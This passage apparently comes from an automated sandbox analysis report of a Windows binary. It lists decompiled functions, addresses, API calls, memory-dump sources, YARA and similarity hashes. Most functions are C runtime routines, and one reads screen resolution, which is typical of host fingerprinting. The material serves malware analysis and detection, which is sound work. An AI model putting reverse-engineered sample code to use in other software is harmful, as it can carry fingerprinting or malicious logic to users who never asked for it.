                                                                                                                              0x0040f52d
                                                                                                                              0x0040f537
                                                                                                                              0x0040f537

                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 0040F530
                                                                                                                                • Part of subcall function 0040537B: __FF_MSGBANNER.LIBCMT ref: 00405394
                                                                                                                                • Part of subcall function 0040537B: __NMSG_WRITE.LIBCMT ref: 0040539B
                                                                                                                                • Part of subcall function 0040537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 004053C0
                                                                                                                              • _free.LIBCMT ref: 0040F543
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1020059152-0
                                                                                                                              • Opcode ID: 78a0b71d87b9157f729955b6eb00b17edf7ed4b9ebaf12339a77c87a94f928f1
                                                                                                                              • Instruction ID: e639ce4e8cc3b034b6be9655353c02bb3c552d4dafcb81851dfe93b90508b3b7
                                                                                                                              • Opcode Fuzzy Hash: 78a0b71d87b9157f729955b6eb00b17edf7ed4b9ebaf12339a77c87a94f928f1
                                                                                                                              • Instruction Fuzzy Hash: 1B11B632508611BACB352FB6AC0565B3694DB843A4B20053BF848B6AD2EA3C98454E5C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AF50, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E0041AF50() {
				int _v8;
				int _v16;
				struct HDC__* _v20;
				signed int _v24;
				char _v292;
				signed int _t13;
				CHAR* _t15;
				CHAR* _t21;
				intOrPtr _t25;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t13 =  *0x4301f4; // 0xe687535
				_v24 = _t13 ^ _t35;
				_t15 =  *0x4320ec; // 0x23367d0
				_v20 = CreateDCA(_t15, 0, 0, 0);
				_v8 = GetDeviceCaps(_v20, 8);
				_v16 = GetDeviceCaps(_v20, 0xa);
				ReleaseDC(0, _v20);
				_t21 =  *0x4322a0; // 0x2337228
				wsprintfA( &_v292, _t21, _v8, _v16);
				return E00404354( &_v292, _t25, _v24 ^ _t35, _v8, _t33, _t34);
			}















                                                                                                                              0x0041af59
                                                                                                                              0x0041af60
                                                                                                                              0x0041af69
                                                                                                                              0x0041af75
                                                                                                                              0x0041af84
                                                                                                                              0x0041af93
                                                                                                                              0x0041af9c
                                                                                                                              0x0041afaa
                                                                                                                              0x0041afb7
                                                                                                                              0x0041afd3

                                                                                                                              APIs
                                                                                                                              • CreateDCA.GDI32(023367D0,00000000,00000000,00000000), ref: 0041AF6F
                                                                                                                              • GetDeviceCaps.GDI32(?,00000008), ref: 0041AF7E
                                                                                                                              • GetDeviceCaps.GDI32(?,0000000A), ref: 0041AF8D
                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0041AF9C
                                                                                                                              • wsprintfA.USER32 ref: 0041AFB7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDevice$CreateReleasewsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1281593598-0
                                                                                                                              • Opcode ID: 371d4faec7933df576802d169817c8fea66655d0a078c60c3cc852af34df5aeb
                                                                                                                              • Instruction ID: aa42d19908ffc11280b7e58a0d9ced6239d9bca7c8999a553ca28c3925dcd464
                                                                                                                              • Opcode Fuzzy Hash: 371d4faec7933df576802d169817c8fea66655d0a078c60c3cc852af34df5aeb
                                                                                                                              • Instruction Fuzzy Hash: 44010075A00208AFDB04EFA4ED45FBEB7B8FB48700F005669FA15A7290DA716A44CB65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00408222, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E00408222(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x42de10);
				E00408C20(__ebx, __edi, __esi);
				_t28 = E0040844B(__edx, __edi, _t31);
				_t12 =  *0x430720; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E0040B23F(0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E004081D5(_t29,  *0x430968);
					 *(_t30 - 4) = 0xfffffffe;
					E0040828F();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E0040844B(__edx, _t26, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					E00408BF8(_t20, _t25, _t26, _t29, _t34, 0x20);
				}
				return E00408C65(_t29);
			}








                                                                                                                              0x00408222
                                                                                                                              0x00408222
                                                                                                                              0x00408222
                                                                                                                              0x00408222
                                                                                                                              0x00408222
                                                                                                                              0x00408224
                                                                                                                              0x00408229
                                                                                                                              0x00408233
                                                                                                                              0x00408235
                                                                                                                              0x0040823d
                                                                                                                              0x00408261
                                                                                                                              0x00408263
                                                                                                                              0x00408269
                                                                                                                              0x00408273
                                                                                                                              0x0040827e
                                                                                                                              0x00408281
                                                                                                                              0x00408288
                                                                                                                              0x0040823f
                                                                                                                              0x0040823f
                                                                                                                              0x00408243
                                                                                                                              0x00000000
                                                                                                                              0x00408245
                                                                                                                              0x0040824a
                                                                                                                              0x0040824a
                                                                                                                              0x00408243
                                                                                                                              0x0040824d
                                                                                                                              0x0040824f
                                                                                                                              0x00408253
                                                                                                                              0x00408258
                                                                                                                              0x00408260

                                                                                                                              APIs
                                                                                                                              • __getptd.LIBCMT ref: 0040822E
                                                                                                                                • Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
                                                                                                                                • Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B
                                                                                                                              • __getptd.LIBCMT ref: 00408245
                                                                                                                              • __amsg_exit.LIBCMT ref: 00408253
                                                                                                                              • __lock.LIBCMT ref: 00408263
                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00408277
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 938513278-0
                                                                                                                              • Opcode ID: c1afe40b3333c14941596a3315f65fffdf944bee7a376ba849ebee861053df93
                                                                                                                              • Instruction ID: 46835279915a6046533576c3d8cbd4d1c3ced8590ae02f93d8f6aa4b6b75c0f1
                                                                                                                              • Opcode Fuzzy Hash: c1afe40b3333c14941596a3315f65fffdf944bee7a376ba849ebee861053df93
                                                                                                                              • Instruction Fuzzy Hash: 78F06231945B149BEA21BB75560674A37A0AF00728F1001BFF481772C2CF3C58518A5E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403240, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 97%
                                                                                                                              			E00403240(char __ecx, char _a4) {
				signed int _v8;
				char _v12;
				void* _t49;
				void* _t55;
				intOrPtr _t59;
				void* _t61;
				intOrPtr _t64;
				void* _t70;
				intOrPtr _t74;
				intOrPtr _t100;
				intOrPtr _t103;

				_v12 = __ecx;
				_t2 =  &_a4; // 0x403053
				_t49 = E00403EE0( *_t2);
				_t3 =  &_v12; // 0x403053
				if((E004030B0( *_t3, _t49) & 0x000000ff) == 0) {
					_t30 =  &_v12; // 0x403053
					_t95 =  *_t30;
					_t31 =  &_v12; // 0x403053
					__eflags =  *((intOrPtr*)( *_t30 + 4)) -  *((intOrPtr*)( *_t31 + 8));
					if(__eflags == 0) {
						_t34 =  &_v12; // 0x403053
						E004030F0( *_t34, _t95, __eflags, 1);
					}
					_t35 =  &_v12; // 0x403053
					_t37 =  &_v12; // 0x403053
					_t39 =  &_v12; // 0x403053
					E004031E0( *((intOrPtr*)( *_t35 + 4)),  *_t39,  *((intOrPtr*)( *_t37 + 4)),  *((intOrPtr*)( *_t35 + 4)));
					_t40 =  &_a4; // 0x403053
					_t55 = E00403EE0( *_t40);
					_t41 =  &_v12; // 0x403053
					_t43 =  &_v12; // 0x403053
					E00403930( *_t43 + 0xc,  *((intOrPtr*)( *_t41 + 4)), _t55);
					_t44 =  &_v12; // 0x403053
					_t100 =  *((intOrPtr*)( *_t44 + 4)) + 0x44;
					__eflags = _t100;
					_t46 =  &_v12; // 0x403053
					_t59 =  *_t46;
					 *((intOrPtr*)(_t59 + 4)) = _t100;
					return _t59;
				}
				_t4 =  &_a4; // 0x403053
				_t61 = E00403EE0( *_t4);
				_t5 =  &_v12; // 0x403053
				asm("cdq");
				_v8 = (_t61 -  *((intOrPtr*)( *_t5))) / 0x44;
				_t11 =  &_v12; // 0x403053
				_t103 =  *_t11;
				_t12 =  &_v12; // 0x403053
				_t64 =  *_t12;
				_t116 =  *((intOrPtr*)(_t103 + 4)) -  *((intOrPtr*)(_t64 + 8));
				if( *((intOrPtr*)(_t103 + 4)) ==  *((intOrPtr*)(_t64 + 8))) {
					_t15 =  &_v12; // 0x403053
					E004030F0( *_t15, _t103, _t116, 1);
				}
				_t16 =  &_v12; // 0x403053
				_t18 =  &_v12; // 0x403053
				_t20 =  &_v12; // 0x403053
				E004031E0( *((intOrPtr*)( *_t16 + 4)),  *_t20,  *((intOrPtr*)( *_t18 + 4)),  *((intOrPtr*)( *_t16 + 4)));
				_t22 =  &_v12; // 0x403053
				_t70 = E00403EE0(_v8 * 0x44 +  *((intOrPtr*)( *_t22)));
				_t23 =  &_v12; // 0x403053
				_t25 =  &_v12; // 0x403053
				E00403930( *_t25 + 0xc,  *((intOrPtr*)( *_t23 + 4)), _t70);
				_t26 =  &_v12; // 0x403053
				_t74 =  *((intOrPtr*)( *_t26 + 4)) + 0x44;
				_t28 =  &_v12; // 0x403053
				 *((intOrPtr*)( *_t28 + 4)) = _t74;
				return _t74;
			}














                                                                                                                              0x00403246
                                                                                                                              0x00403249
                                                                                                                              0x0040324d
                                                                                                                              0x00403256
                                                                                                                              0x00403263
                                                                                                                              0x004032ef
                                                                                                                              0x004032ef
                                                                                                                              0x004032f2
                                                                                                                              0x004032f8
                                                                                                                              0x004032fb
                                                                                                                              0x004032ff
                                                                                                                              0x00403302
                                                                                                                              0x00403302
                                                                                                                              0x00403307
                                                                                                                              0x0040330e
                                                                                                                              0x00403315
                                                                                                                              0x00403318
                                                                                                                              0x0040331d
                                                                                                                              0x00403321
                                                                                                                              0x0040332a
                                                                                                                              0x00403331
                                                                                                                              0x00403338
                                                                                                                              0x00403340
                                                                                                                              0x00403346
                                                                                                                              0x00403346
                                                                                                                              0x00403349
                                                                                                                              0x00403349
                                                                                                                              0x0040334c
                                                                                                                              0x00000000
                                                                                                                              0x0040334c
                                                                                                                              0x00403269
                                                                                                                              0x0040326d
                                                                                                                              0x00403275
                                                                                                                              0x0040327a
                                                                                                                              0x00403282
                                                                                                                              0x00403285
                                                                                                                              0x00403285
                                                                                                                              0x00403288
                                                                                                                              0x00403288
                                                                                                                              0x0040328e
                                                                                                                              0x00403291
                                                                                                                              0x00403295
                                                                                                                              0x00403298
                                                                                                                              0x00403298
                                                                                                                              0x0040329d
                                                                                                                              0x004032a4
                                                                                                                              0x004032ab
                                                                                                                              0x004032ae
                                                                                                                              0x004032b9
                                                                                                                              0x004032bf
                                                                                                                              0x004032c8
                                                                                                                              0x004032cf
                                                                                                                              0x004032d6
                                                                                                                              0x004032de
                                                                                                                              0x004032e4
                                                                                                                              0x004032e7
                                                                                                                              0x004032ea
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: construct
                                                                                                                              • String ID: S0@$S0@
                                                                                                                              • API String ID: 1526029037-1005104211
                                                                                                                              • Opcode ID: 2b46c4d5b80c92857b29efff7dfa5c1110fdc9c701c2f427c0e5af701a796781
                                                                                                                              • Instruction ID: dba46e10441b74b44bcdba22c1b1a89158026711fe9c34101d68b7ec43f2729a
                                                                                                                              • Opcode Fuzzy Hash: 2b46c4d5b80c92857b29efff7dfa5c1110fdc9c701c2f427c0e5af701a796781
                                                                                                                              • Instruction Fuzzy Hash: 503143B5A00104AFCB04DF95C891D5EFF7AAF88308F1481A9E509BB392D735EE81CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406DD7, Relevance: 6.2, APIs: 4, Instructions: 173COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 97%
                                                                                                                              			E00406DD7(void* __ebx, void* __edi, signed char* _a4, signed int _a8, intOrPtr _a12) {
				signed int _v7;
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				signed int _t72;
				signed int _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				signed short _t82;
				void* _t84;
				signed short _t87;
				intOrPtr _t91;
				signed int _t97;
				signed int _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				signed int _t104;
				signed char* _t114;
				signed char* _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t124;
				signed int _t125;
				void* _t127;

				E00404BBD(__ebx,  &_v24, __edi, _a12);
				_t114 = _a4;
				_t129 = _t114;
				if(_t114 != 0) {
					_push(__ebx);
					_t97 = _a8;
					__eflags = _t97;
					if(__eflags != 0) {
						_t72 = _v20;
						__eflags =  *(_t72 + 8);
						if( *(_t72 + 8) != 0) {
							_push(__edi);
							while(1) {
								_t100 =  *_t114 & 0x000000ff;
								_t124 = _t100 & 0x000000ff;
								_t115 =  &(_t114[1]);
								__eflags =  *(_t124 + _t72 + 0x1d) & 0x00000004;
								_a4 = _t115;
								if(( *(_t124 + _t72 + 0x1d) & 0x00000004) == 0) {
									goto L20;
								}
								__eflags =  *_t115;
								if(__eflags != 0) {
									_t84 = E0040E53F(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t115 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
									_t127 = _t127 + 0x24;
									__eflags = _t84 - 1;
									if(_t84 != 1) {
										__eflags = _t84 - 2;
										if(__eflags != 0) {
											goto L37;
										} else {
											_t87 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
											__eflags = _t87;
											_t125 = _t87 & 0x0000ffff;
											goto L19;
										}
									} else {
										_t125 = _v8 & 0x000000ff;
										L19:
										_a4 =  &(_a4[1]);
										_t72 = _v20;
										goto L23;
									}
								} else {
									_t125 = 0;
									L23:
									_t102 =  *_t97 & 0x000000ff;
									_t117 = _t102 & 0x000000ff;
									_t97 = _t97 + 1;
									__eflags =  *(_t117 + _t72 + 0x1d) & 0x00000004;
									if(( *(_t117 + _t72 + 0x1d) & 0x00000004) == 0) {
										_t118 = _t102;
										_t103 = _t118 + _t72;
										__eflags =  *(_t103 + 0x1d) & 0x00000010;
										if(( *(_t103 + 0x1d) & 0x00000010) == 0) {
											_t104 = _t118;
										} else {
											_t104 =  *(_t103 + 0x11d) & 0x000000ff;
										}
										goto L34;
									} else {
										__eflags =  *_t97;
										if(__eflags != 0) {
											_t77 = E0040E53F(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t97 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
											_t127 = _t127 + 0x24;
											__eflags = _t77 - 1;
											if(_t77 != 1) {
												__eflags = _t77 - 2;
												if(__eflags != 0) {
													L37:
													 *((intOrPtr*)(E00405A49(__eflags))) = 0x16;
													__eflags = _v12;
													if(_v12 != 0) {
														_t79 = _v16;
														_t61 = _t79 + 0x70;
														 *_t61 =  *(_t79 + 0x70) & 0xfffffffd;
														__eflags =  *_t61;
													}
													_t74 = 0x7fffffff;
												} else {
													_t82 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
													__eflags = _t82;
													_t104 = _t82 & 0x0000ffff;
													goto L30;
												}
											} else {
												_t104 = _v8 & 0x000000ff;
												L30:
												_t72 = _v20;
												_t97 = _t97 + 1;
												goto L34;
											}
										} else {
											_t104 = 0;
											L34:
											__eflags = _t104 - _t125;
											if(_t104 != _t125) {
												asm("sbb eax, eax");
												_t74 = (_t72 & 0x00000002) - 1;
												__eflags = _v12;
												if(_v12 != 0) {
													 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
												}
											} else {
												__eflags = _t125;
												if(_t125 == 0) {
													__eflags = _v12;
													if(_v12 != 0) {
														_t75 = _v16;
														_t69 = _t75 + 0x70;
														 *_t69 =  *(_t75 + 0x70) & 0xfffffffd;
														__eflags =  *_t69;
													}
													_t74 = 0;
													__eflags = 0;
												} else {
													_t114 = _a4;
													continue;
												}
											}
										}
									}
								}
								goto L46;
								L20:
								_t116 = _t100;
								_t101 = _t116 + _t72;
								__eflags =  *(_t101 + 0x1d) & 0x00000010;
								if(( *(_t101 + 0x1d) & 0x00000010) == 0) {
									_t125 = _t116;
								} else {
									_t125 =  *(_t101 + 0x11d) & 0x000000ff;
								}
								goto L23;
							}
						} else {
							_t74 = E0040523A(_t114, __edi, _t114, _t97,  &_v24);
							__eflags = _v12;
							if(_v12 != 0) {
								 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
							}
						}
					} else {
						 *((intOrPtr*)(E00405A49(__eflags))) = 0x16;
						E00407461();
						__eflags = _v12 - _t97;
						if(_v12 != _t97) {
							_t91 = _v16;
							_t11 = _t91 + 0x70;
							 *_t11 =  *(_t91 + 0x70) & 0xfffffffd;
							__eflags =  *_t11;
						}
						_t74 = 0x7fffffff;
					}
					L46:
					return _t74;
				} else {
					 *((intOrPtr*)(E00405A49(_t129))) = 0x16;
					E00407461();
					if(_v12 != 0) {
						 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
					}
					return 0x7fffffff;
				}
			}
































                                                                                                                              0x00406de5
                                                                                                                              0x00406dea
                                                                                                                              0x00406ded
                                                                                                                              0x00406def
                                                                                                                              0x00406e15
                                                                                                                              0x00406e16
                                                                                                                              0x00406e19
                                                                                                                              0x00406e1b
                                                                                                                              0x00406e43
                                                                                                                              0x00406e46
                                                                                                                              0x00406e4a
                                                                                                                              0x00406e70
                                                                                                                              0x00406e77
                                                                                                                              0x00406e77
                                                                                                                              0x00406e7a
                                                                                                                              0x00406e7d
                                                                                                                              0x00406e7e
                                                                                                                              0x00406e83
                                                                                                                              0x00406e86
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406e88
                                                                                                                              0x00406e8b
                                                                                                                              0x00406ea8
                                                                                                                              0x00406ead
                                                                                                                              0x00406eb0
                                                                                                                              0x00406eb3
                                                                                                                              0x00406ebb
                                                                                                                              0x00406ebe
                                                                                                                              0x00000000
                                                                                                                              0x00406ec4
                                                                                                                              0x00406ed5
                                                                                                                              0x00406ed5
                                                                                                                              0x00406ed8
                                                                                                                              0x00000000
                                                                                                                              0x00406ed8
                                                                                                                              0x00406eb5
                                                                                                                              0x00406eb5
                                                                                                                              0x00406edb
                                                                                                                              0x00406edb
                                                                                                                              0x00406ede
                                                                                                                              0x00000000
                                                                                                                              0x00406ede
                                                                                                                              0x00406e8d
                                                                                                                              0x00406e8d
                                                                                                                              0x00406ef9
                                                                                                                              0x00406ef9
                                                                                                                              0x00406efc
                                                                                                                              0x00406eff
                                                                                                                              0x00406f00
                                                                                                                              0x00406f05
                                                                                                                              0x00406f5e
                                                                                                                              0x00406f60
                                                                                                                              0x00406f63
                                                                                                                              0x00406f67
                                                                                                                              0x00406f72
                                                                                                                              0x00406f69
                                                                                                                              0x00406f69
                                                                                                                              0x00406f69
                                                                                                                              0x00000000
                                                                                                                              0x00406f07
                                                                                                                              0x00406f07
                                                                                                                              0x00406f0a
                                                                                                                              0x00406f29
                                                                                                                              0x00406f2e
                                                                                                                              0x00406f31
                                                                                                                              0x00406f34
                                                                                                                              0x00406f3c
                                                                                                                              0x00406f3f
                                                                                                                              0x00406f86
                                                                                                                              0x00406f8b
                                                                                                                              0x00406f91
                                                                                                                              0x00406f95
                                                                                                                              0x00406f97
                                                                                                                              0x00406f9a
                                                                                                                              0x00406f9a
                                                                                                                              0x00406f9a
                                                                                                                              0x00406f9a
                                                                                                                              0x00406f9e
                                                                                                                              0x00406f41
                                                                                                                              0x00406f52
                                                                                                                              0x00406f52
                                                                                                                              0x00406f55
                                                                                                                              0x00000000
                                                                                                                              0x00406f55
                                                                                                                              0x00406f36
                                                                                                                              0x00406f36
                                                                                                                              0x00406f58
                                                                                                                              0x00406f58
                                                                                                                              0x00406f5b
                                                                                                                              0x00000000
                                                                                                                              0x00406f5b
                                                                                                                              0x00406f0c
                                                                                                                              0x00406f0c
                                                                                                                              0x00406f74
                                                                                                                              0x00406f74
                                                                                                                              0x00406f77
                                                                                                                              0x00406fa5
                                                                                                                              0x00406faa
                                                                                                                              0x00406fab
                                                                                                                              0x00406faf
                                                                                                                              0x00406fb4
                                                                                                                              0x00406fb4
                                                                                                                              0x00406f79
                                                                                                                              0x00406f79
                                                                                                                              0x00406f7c
                                                                                                                              0x00406fba
                                                                                                                              0x00406fbe
                                                                                                                              0x00406fc0
                                                                                                                              0x00406fc3
                                                                                                                              0x00406fc3
                                                                                                                              0x00406fc3
                                                                                                                              0x00406fc3
                                                                                                                              0x00406fc7
                                                                                                                              0x00406fc7
                                                                                                                              0x00406f7e
                                                                                                                              0x00406f7e
                                                                                                                              0x00000000
                                                                                                                              0x00406f7e
                                                                                                                              0x00406f7c
                                                                                                                              0x00406f77
                                                                                                                              0x00406f0a
                                                                                                                              0x00406f05
                                                                                                                              0x00000000
                                                                                                                              0x00406ee3
                                                                                                                              0x00406ee3
                                                                                                                              0x00406ee5
                                                                                                                              0x00406ee8
                                                                                                                              0x00406eec
                                                                                                                              0x00406ef7
                                                                                                                              0x00406eee
                                                                                                                              0x00406eee
                                                                                                                              0x00406eee
                                                                                                                              0x00000000
                                                                                                                              0x00406eec
                                                                                                                              0x00406e4c
                                                                                                                              0x00406e52
                                                                                                                              0x00406e5a
                                                                                                                              0x00406e5e
                                                                                                                              0x00406e67
                                                                                                                              0x00406e67
                                                                                                                              0x00406e5e
                                                                                                                              0x00406e1d
                                                                                                                              0x00406e22
                                                                                                                              0x00406e28
                                                                                                                              0x00406e2d
                                                                                                                              0x00406e30
                                                                                                                              0x00406e32
                                                                                                                              0x00406e35
                                                                                                                              0x00406e35
                                                                                                                              0x00406e35
                                                                                                                              0x00406e35
                                                                                                                              0x00406e39
                                                                                                                              0x00406e39
                                                                                                                              0x00406fcb
                                                                                                                              0x00406fcd
                                                                                                                              0x00406df1
                                                                                                                              0x00406df6
                                                                                                                              0x00406dfc
                                                                                                                              0x00406e05
                                                                                                                              0x00406e0a
                                                                                                                              0x00406e0a
                                                                                                                              0x00406e14
                                                                                                                              0x00406e14

                                                                                                                              APIs
                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00406DE5
                                                                                                                                • Part of subcall function 00404BBD: __getptd.LIBCMT ref: 00404BD0
                                                                                                                                • Part of subcall function 00405A49: __getptd_noexit.LIBCMT ref: 00405A49
                                                                                                                              • __stricmp_l.LIBCMT ref: 00406E52
                                                                                                                                • Part of subcall function 0040523A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405249
                                                                                                                              • ___crtLCMapStringA.LIBCMT ref: 00406EA8
                                                                                                                              • ___crtLCMapStringA.LIBCMT ref: 00406F29
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2544346105-0
                                                                                                                              • Opcode ID: 5b4e5cb6d36eafff8e4d5da37fd9b8f9255a38704f12a10a44c2eb4e80d90e02
                                                                                                                              • Instruction ID: 62290cf40d8ca8d2b1e8358bfb7ba8d41976490486b4128a42a2020d3f6d2eea
                                                                                                                              • Opcode Fuzzy Hash: 5b4e5cb6d36eafff8e4d5da37fd9b8f9255a38704f12a10a44c2eb4e80d90e02
                                                                                                                              • Instruction Fuzzy Hash: 38513D7090425A9BDF258765C485BBB7BB0AB01328F2541BFF0A37B2D2C7388E52DB55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041290D, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041290D(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				void* __ebx;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00404BBD(0,  &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0040AEAB( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00405A49(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}


















                                                                                                                              0x00412917
                                                                                                                              0x0041291e
                                                                                                                              0x00412935
                                                                                                                              0x00000000
                                                                                                                              0x00412925
                                                                                                                              0x00412927
                                                                                                                              0x00412941
                                                                                                                              0x00412946
                                                                                                                              0x00412949
                                                                                                                              0x0041294c
                                                                                                                              0x00412974
                                                                                                                              0x0041297b
                                                                                                                              0x0041297d
                                                                                                                              0x004129fe
                                                                                                                              0x00412a19
                                                                                                                              0x00412a1b
                                                                                                                              0x0041295b
                                                                                                                              0x0041295b
                                                                                                                              0x0041295e
                                                                                                                              0x00412960
                                                                                                                              0x00412963
                                                                                                                              0x00412963
                                                                                                                              0x00412963
                                                                                                                              0x00412963
                                                                                                                              0x00000000
                                                                                                                              0x00412969
                                                                                                                              0x004129dd
                                                                                                                              0x004129dd
